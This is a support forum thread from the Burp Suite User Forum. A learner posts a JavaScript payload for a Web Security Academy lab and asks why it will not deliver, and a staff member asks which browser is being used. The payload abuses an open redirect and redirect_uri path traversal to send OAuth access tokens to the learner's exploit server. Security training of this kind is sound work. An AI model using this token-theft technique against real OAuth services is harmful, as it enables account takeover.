Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Stealing OAuth access tokens via an open redirect

nejigenius | Last updated: Jun 27, 2024 07:38AM UTC

<script> if (!document.location.hash) { window.location = 'https://oauth-0a3100f70481e50880c679a0027c0040.oauth-server.net/auth?client_id=pwfawrjz6wozrblc7kiwn&redirect_uri=https://0a4300a6044ae536804b7bbb00110027.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ac400bb0458e5e980b57a22015a00dd.exploit-server.net/exploit/&response_type=token&nonce=-1360471060&scope=openid%20profile%20email' } else { window.location = '/?'+document.location.hash.substr(1) } </script> I've been struggling with a couple of lab exercises. In one of them, I've got a payload that seems to work fine when I use the "View exploit" option. But when I try to actually deliver it by clicking "Deliver", nothing happens. I've checked the logs, and I don't see any IP addresses showing up except my own. I'm having a similar issue with another lab called "OAuth account hijacking via redirect_uri". For the past two days, I just can't get the payload to deliver to the victim's system. I've tried troubleshooting by resetting the labs, waiting for about 20-30 minutes, and then starting them up again. But so far, nothing's worked. I'm really not sure what I'm doing wrong here, and it's pretty frustrating. Any ideas on what might be causing this or how I can fix it?

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 07:59AM UTC

Hi, Which browser are you using when you attempt this particular lab? If you use a standard version of Chrome (rather than the embedded browser) does this allow you to successfully deliver the exploit and retrieve the token from the victim user in the logs?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.